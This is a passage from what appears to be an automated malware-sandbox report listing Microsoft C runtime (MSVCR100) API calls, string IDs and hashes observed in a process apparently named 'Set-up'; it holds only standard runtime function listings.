                                                                                              • Instruction Fuzzy Hash: A851F7319052A4BEDB21ABB59C86D9F3B6CDF47B74B2045B5F02496180FB3ECA4087A0
                                                                                              APIs
                                                                                              • _FindAndUnlinkFrame.MSVCR100(?), ref: 6BB77B42
                                                                                                • Part of subcall function 6BB77840: _getptd.MSVCR100 ref: 6BB77846
                                                                                                • Part of subcall function 6BB77840: _getptd.MSVCR100 ref: 6BB7785A
                                                                                              • _getptd.MSVCR100 ref: 6BB77B58
                                                                                              • _getptd.MSVCR100 ref: 6BB77B67
                                                                                              • _getptd.MSVCR100 ref: 6BB77B78
                                                                                              • _getptd.MSVCR100 ref: 6BB77B8C
                                                                                              • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6BB77B9A
                                                                                                • Part of subcall function 6BB77C17: _getptd.MSVCR100(?,6BB77B9F,?), ref: 6BB77C1C
                                                                                              • _getptd.MSVCR100(00000001), ref: 6BB77BA6
                                                                                              • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6BB77BB1
                                                                                              • _getptd.MSVCR100 ref: 6BB77BB8
                                                                                              • _getptd.MSVCR100 ref: 6BB77BC7
                                                                                              • _getptd.MSVCR100 ref: 6BB77BD8
                                                                                              • _getptd.MSVCR100 ref: 6BB77BF6
                                                                                              • _getptd.MSVCR100 ref: 6BB77C04
                                                                                              • _getptd.MSVCR100 ref: 6BB8CA49
                                                                                              • _getptd.MSVCR100 ref: 6BB8CA61
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                              • String ID: csm
                                                                                              • API String ID: 473968603-1018135373
                                                                                              • Opcode ID: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
                                                                                              • Instruction ID: b61a2154bf00b4e6872f8b69da187ff572ed13b8ad22149a08ff3135db04147a
                                                                                              • Opcode Fuzzy Hash: 7c00eafc30ea7a7b13f024ac2faff1589b0cf6e0009a91ce2b35c0ac754900c2
                                                                                              • Instruction Fuzzy Hash: 13311830505280CFC214AF67C485E5D37A5EF90269F8684F9D4688FA32DFBADD84CBA1
                                                                                              APIs
                                                                                              • wcsrchr.MSVCR100(?,0000005C), ref: 6BB7360D
                                                                                              • wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6BB73617
                                                                                              • wcsrchr.MSVCR100(00000000,0000002E), ref: 6BB73636
                                                                                              • _waccess_s.MSVCR100(?,00000000), ref: 6BB7364A
                                                                                              • _errno.MSVCR100 ref: 6BB7367D
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB8833A
                                                                                              • wcschr.MSVCR100(?,0000003A), ref: 6BB8834A
                                                                                              • _wcslen.LIBCMT(?), ref: 6BB8835C
                                                                                              • _calloc_crt.MSVCR100(00000003,00000002,?), ref: 6BB88367
                                                                                              • wcscpy_s.MSVCR100(00000000,00000003,6BB93048), ref: 6BB8837F
                                                                                              • wcscat_s.MSVCR100(00000000,00000003,?), ref: 6BB8838E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcsrchr$_calloc_crt_errno_invalid_parameter_noinfo_waccess_s_wcslenwcscat_swcschrwcscpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 255226058-0
                                                                                              • Opcode ID: d923334df452a3b743e8c6f1b58ce0d232cc07eca25a7ed18c8500c5f2be50c0
                                                                                              • Instruction ID: ea5d9130708150e2a73962785b4b0b328e00171487b08b90b158a7efbaa74644
                                                                                              • Opcode Fuzzy Hash: d923334df452a3b743e8c6f1b58ce0d232cc07eca25a7ed18c8500c5f2be50c0
                                                                                              • Instruction Fuzzy Hash: 1451E632D04695EBEB21AF75DC82A9E3778EF01794F400164ED24A7294FB3DCE119B50
                                                                                              APIs
                                                                                              • _mbschr.MSVCR100(00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB7263B
                                                                                                • Part of subcall function 6BB725FD: _mbschr_l.MSVCR100(00000000,00000000,00000000,?,6BB72640,00000000,0000003D,00000000,00000000,74DEDFF0), ref: 6BB7260A
                                                                                              • free.MSVCR100(?,00000000,00000000,74DEDFF0), ref: 6BB726A2
                                                                                              • _errno.MSVCR100(00000000,00000000,74DEDFF0), ref: 6BB726B4
                                                                                              • _errno.MSVCR100(74DEDFF0), ref: 6BB91B83
                                                                                              • _invalid_parameter_noinfo.MSVCR100(74DEDFF0), ref: 6BB91B8E
                                                                                              • ___wtomb_environ.LIBCMT ref: 6BB91BB7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$___wtomb_environ_invalid_parameter_noinfo_mbschr_mbschr_lfree
                                                                                              • String ID:
                                                                                              • API String ID: 679965329-0
                                                                                              APIs
                                                                                              • wcschr.MSVCR100(00000000,0000003D,74DEDF80,00000000,01331910), ref: 6BB724B5
                                                                                              • free.MSVCR100(?,74DEDF80,00000000,01331910), ref: 6BB72528
                                                                                              • _errno.MSVCR100(74DEDF80,00000000,01331910), ref: 6BB773F0
                                                                                              • _errno.MSVCR100(01331910), ref: 6BB91473
                                                                                              • _invalid_parameter_noinfo.MSVCR100(01331910), ref: 6BB9147E
                                                                                              • ___mbtow_environ.LIBCMT ref: 6BB914B0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _errno$___mbtow_environ_invalid_parameter_noinfofreewcschr
                                                                                              • String ID:
                                                                                              • API String ID: 3080074160-0
                                                                                              APIs
                                                                                              • DName::DName.LIBCMT ref: 6BB8D3AE
                                                                                              • DName::DName.LIBCMT ref: 6BB8D3E3
                                                                                              • atol.MSVCR100(6BB6F99F,6BB6F99F,00000010,FFFF0000,?,00000000), ref: 6BB8D46D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: NameName::$atol
                                                                                              • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                              • API String ID: 2083219425-3945972591
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,000000FF,00000024), ref: 6BB76905
                                                                                              • _get_daylight.MSVCR100(?), ref: 6BB76941
                                                                                              • _get_dstbias.MSVCR100(?), ref: 6BB76953
                                                                                              • _get_timezone.MSVCR100(?), ref: 6BB76965
                                                                                              • _gmtime64_s.MSVCR100(?,?), ref: 6BB76999
                                                                                              • _errno.MSVCR100 ref: 6BB769BF
                                                                                              • _gmtime64_s.MSVCR100(?,?), ref: 6BB769CB
                                                                                              • _errno.MSVCR100 ref: 6BB89DE1
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB89DEB
                                                                                              • _errno.MSVCR100 ref: 6BB89DF7
                                                                                              • _invalid_parameter_noinfo.MSVCR100 ref: 6BB89E01
                                                                                              • _gmtime64_s.MSVCR100(?,?), ref: 6BB89E3A
                                                                                              • __allrem.LIBCMT ref: 6BB89EA5
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB89EC1
                                                                                              • __allrem.LIBCMT ref: 6BB89ED8
                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6BB89EF6
                                                                                              • __allrem.LIBCMT ref: 6BB89F0D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: __allrem_errno_gmtime64_s$Unothrow_t@std@@@__ehfuncinfo$??2@_invalid_parameter_noinfo$_get_daylight_get_dstbias_get_timezone_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3568092448-0
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9BAE9
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000020,6BB9BAB4,00000000,6BC0462C,0000000C,6BBA018B,ECA782CA,?,?), ref: 6BB9BB19
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?), ref: 6BB9BB58
                                                                                              • TlsAlloc.KERNEL32 ref: 6BB9BB62
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BB70
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BB88
                                                                                              • _CxxThrowException.MSVCR100(6BB6BD3C,6BB6BDD8,?,00000001), ref: 6BB9BB96
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,FlushProcessWriteBuffers), ref: 6BB9BBA9
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BBB0
                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000004), ref: 6BB9BBE3
                                                                                              • std::exception::exception.LIBCMT(?,00000001), ref: 6BB9BC03
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 6BB9BC30
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BB9BC4B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocCountCriticalInitializeSectionSpin$AddressConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventExceptionH_prolog3HandleLastModuleProcThrowVirtualstd::exception::exception
                                                                                              • String ID: FlushProcessWriteBuffers$bad allocation$kernel32.dll
                                                                                              • API String ID: 2685218194-103648123
                                                                                              APIs
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFE78), ref: 6BB978C7
                                                                                                • Part of subcall function 6BB777D4: RaiseException.KERNEL32(?,?,6BB8F317,?,?,?,?,?,6BB8F317,?,6BB6BDD8,6BC07580), ref: 6BB77813
                                                                                              • std::exception::exception.LIBCMT ref: 6BB97901
                                                                                              • ?wait@event@Concurrency@@QAEII@Z.MSVCR100(00000001,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB9791C
                                                                                              • std::exception::exception.LIBCMT ref: 6BB978B0
                                                                                                • Part of subcall function 6BBD3502: std::exception::_Copy_str.LIBCMT(6BBA2171,?,?,6BBA2171,6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBD351D
                                                                                              • std::exception::exception.LIBCMT ref: 6BB97956
                                                                                              • ??0scoped_lock@critical_section@Concurrency@@QAE@AAV12@@Z.MSVCR100(?,?,00000000,ECA782CA,?,00000000,ECA782CA,00000000,6BB95CBE,6BB95C86), ref: 6BB979BF
                                                                                                • Part of subcall function 6BB9B030: __EH_prolog3.LIBCMT ref: 6BB9B037
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB97A30
                                                                                              • ?unlock@critical_section@Concurrency@@QAEXXZ.MSVCR100 ref: 6BB97A85
                                                                                              • ?GetSharedTimerQueue@details@Concurrency@@YAPAXXZ.MSVCR100(00000002,6BB97DE5,ECA782CA,000000FF,00000000,00000020), ref: 6BB97AEE
                                                                                              • CreateTimerQueueTimer.KERNEL32(ECA782DA,00000000,6BB97DE5,ECA782CA,000000FF,00000000,00000020), ref: 6BB97AF9
                                                                                              • std::exception::exception.LIBCMT(?,00000001), ref: 6BB97B15
                                                                                              • ?Block@Context@Concurrency@@SAXXZ.MSVCR100 ref: 6BB97B37
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: Concurrency@@$std::exception::exception$Timer$?unlock@critical_section@Exception$??0scoped_lock@critical_section@?wait@event@Block@Context@Copy_strCreateH_prolog3QueueQueue@details@RaiseSharedThrowV12@@std::exception::_
                                                                                              • String ID: bad allocation$pEvents
                                                                                              • API String ID: 3019020058-4135266256
                                                                                              APIs
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C371
                                                                                              • _memset.LIBCMT(00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C37D
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C394
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,00000000,00000024,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C3B2
                                                                                              • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C3DA
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 6BB9C3E1
                                                                                              • _memset.LIBCMT(00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C3FD
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000002,00000000,?,?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C41D
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C468
                                                                                              • _memset.LIBCMT(00000000,00000000,6BB95C86,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C479
                                                                                              • ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,00000000,6BB95C86,00000000,00000000,?,?,6BB9BC2C), ref: 6BB9C490
                                                                                              • free.MSVCR100(?,?,?,?,?,00000000,?,?,6BB9BC2C), ref: 6BB9C5A1
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                               • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                               • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$Process$AffinityCurrentMaskfree
                                                                                              • String ID: $$$
                                                                                              • API String ID: 3179535153-233714265
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,SetThreadGroupAffinity,0000FFFF,?,00000000,?,?,?,?,?,?,?,6BB9C2D2), ref: 6BB9BD51
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BD5A
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetThreadGroupAffinity,?,?,?,?,?,?,?,6BB9C2D2), ref: 6BB9BD65
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BD68
                                                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx), ref: 6BB9BD96
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 6BB9BD99
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BD9F
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6BB9BDB7
                                                                                              • _CxxThrowException.MSVCR100(?,6BBFFEB4,00000000), ref: 6BB9BDC5
                                                                                              • GetLastError.KERNEL32 ref: 6BB9BDDD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.2017067723.000000006BB51000.00000020.00000001.01000000.00000010.sdmp, Offset: 6BB50000, based on PE: true
                                                                                              • Associated: 00000005.00000002.2017015412.000000006BB50000.00000002.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017131595.000000006BC03000.00000004.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017160597.000000006BC05000.00000008.00000001.01000000.00000010.sdmp
                                                                                              • Associated: 00000005.00000002.2017176492.000000006BC08000.00000002.00000001.01000000.00000010.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_6bb50000_Set-up.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressHandleModuleProc$ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow
                                                                                              • String ID: GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$kernel32.dll
                                                                                              APIs
                                                                                              • ___crtGetStringTypeA.LIBCMT ref: 6BB657BE
                                                                                              • memcmp.MSVCR100(?,000000FE), ref: 6BB6587C
                                                                                              • _getptd.MSVCR100(00000001,00000000), ref: 6BB658D1
                                                                                              • __expandlocale.LIBCMT ref: 6BB658F9
                                                                                                • Part of subcall function 6BB64CF9: _getptd.MSVCR100(00000000,00000000,00000005), ref: 6BB64D2F
                                                                                                • Part of subcall function 6BB64CF9: strcpy_s.MSVCR100(00000000,00000000,6BB64DD8,00000000,00000000,00000005), ref: 6BB64D9D
                                                                                              • strcmp.MSVCR100(?,?,?,?,?,?,00000001,00000000), ref: 6BB65918
                                                                                              • _strlen.LIBCMT(?,?,?,?,?,00000001,00000000), ref: 6BB6592E
                                                                                              • _malloc_crt.MSVCR100(-00000005,?,?,?,?,?,00000001,00000000), ref: 6BB6593D
                                                                                                • Part of subcall function 6BB60CD9: malloc.MSVCR100(00000001,00000001,00000001,?,6BB6AB90,00000018,6BB6AA18,0000000C,6BB874F7,00000001,00000001,?,6BB621A9,0000000D), ref: 6BB60CE5
                                                                                              • memcpy.MSVCR100(?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB6598B
                                                                                              • strcpy_s.MSVCR100(?,?,?,?,?,00000006,?,?,?,?,00000001,00000000), ref: 6BB659B4
                                                                                              • memcpy.MSVCR100(?,?,00000006,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB659EE
                                                                                              • _CRT_RTC_INITW.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 6BB65A1A
                                                                                              • InterlockedDecrement.KERNEL32(00000000), ref: 6BB65A43
                                                                                              • __invoke_watson.LIBCMT(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,00000001), ref: 6BB90C64
                                                                                              Similarity
                                                                                              • API ID: _getptdmemcpystrcpy_s$DecrementInterlockedStringType___crt__expandlocale__invoke_watson_malloc_crt_strlenmallocmemcmpstrcmp
                                                                                              APIs
                                                                                              • _memset.LIBCMT(?,00000000,00000044), ref: 6BB73786
                                                                                              • _calloc_crt.MSVCR100(?,00000001), ref: 6BB737E4
                                                                                              • __doserrno.MSVCR100 ref: 6BB7384A
                                                                                              • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000000,?,00000000,?,?), ref: 6BB7386E
                                                                                              • GetLastError.KERNEL32 ref: 6BB73876
                                                                                              • free.MSVCR100(?), ref: 6BB73881
                                                                                                • Part of subcall function 6BB6014E: HeapFree.KERNEL32(00000000,00000000,?,6BB87602,00000000), ref: 6BB60164
                                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6BB738A9
                                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 6BB738B6
                                                                                              • CloseHandle.KERNEL32(?), ref: 6BB738C2
                                                                                              • CloseHandle.KERNEL32(?), ref: 6BB738C7
                                                                                              • __dosmaperr.LIBCMT(00000000), ref: 6BB882FB
                                                                                              • _exit.MSVCR100(00000000), ref: 6BB88304
                                                                                              Similarity
                                                                                              • API ID: CloseHandleProcess$CodeCreateErrorExitFreeHeapLastObjectSingleWait__doserrno__dosmaperr_calloc_crt_exit_memsetfree
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: _fileno$__fassignisleadbyte
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 6BB9FC58
                                                                                              • ??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004,6BBA0408,6BC04628,0000000C,6BBA0342), ref: 6BB9FC71
                                                                                                • Part of subcall function 6BBA20FC: ??2@YAPAXI@Z.MSVCR100(00000024,00000000,?,6BB9FC76,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA2106
                                                                                                • Part of subcall function 6BBA20FC: memcpy.MSVCR100(00000000,?,00000024,00000024,00000000,?,6BB9FC76,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA2115
                                                                                                • Part of subcall function 6BBA1D1A: ??_U@YAPAXI@Z.MSVCR100(00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004), ref: 6BBA1D5E
                                                                                                • Part of subcall function 6BBA1D1A: _memset.LIBCMT(00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000), ref: 6BBA1D6E
                                                                                                • Part of subcall function 6BBA1D1A: ??2@YAPAXI@Z.MSVCR100(0000000C,00000000,00000000,?,00000000,?,00000000,6BB9FC8E,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?), ref: 6BBA1D75
                                                                                                • Part of subcall function 6BBA1D1A: ??_U@YAPAXI@Z.MSVCR100(00000000), ref: 6BBA1DA3
                                                                                                • Part of subcall function 6BBA1D1A: InitializeSListHead.KERNEL32(?), ref: 6BBA1DB8
                                                                                                • Part of subcall function 6BBA1D1A: InitializeSListHead.KERNEL32(?), ref: 6BBA1DBE
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00000014,6BBA9CD7,00000000,?,00000008,6BBA0075,?,00000000,6BC04624,?,00000004,6BBA0408,6BC04628,0000000C), ref: 6BB9FCA1
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD43
                                                                                              • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD68
                                                                                              • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD71
                                                                                              • InitializeSListHead.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD7A
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FD80
                                                                                                • Part of subcall function 6BBA214D: std::exception::exception.LIBCMT(6BBA1FE2,?,6BBA1FE2,00000001), ref: 6BBA216C
                                                                                                • Part of subcall function 6BBA214D: _CxxThrowException.MSVCR100(?,6BC00018,6BBA1FE2), ref: 6BBA2181
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FD8D
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000007,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E), ref: 6BB9FD9B
                                                                                                • Part of subcall function 6BB9B834: __EH_prolog3.LIBCMT ref: 6BB9B83B
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000007,00000004,00000000), ref: 6BB9FDAF
                                                                                              • ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002,00000002,00000007,00000004,00000000), ref: 6BB9FDCC
                                                                                              • TlsAlloc.KERNEL32(00000002,00000002,00000007,00000004,00000000), ref: 6BB9FDD7
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F,00000000), ref: 6BB9FDE5
                                                                                              • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,6BB9617E,?,6BBA558F), ref: 6BB9FDFD
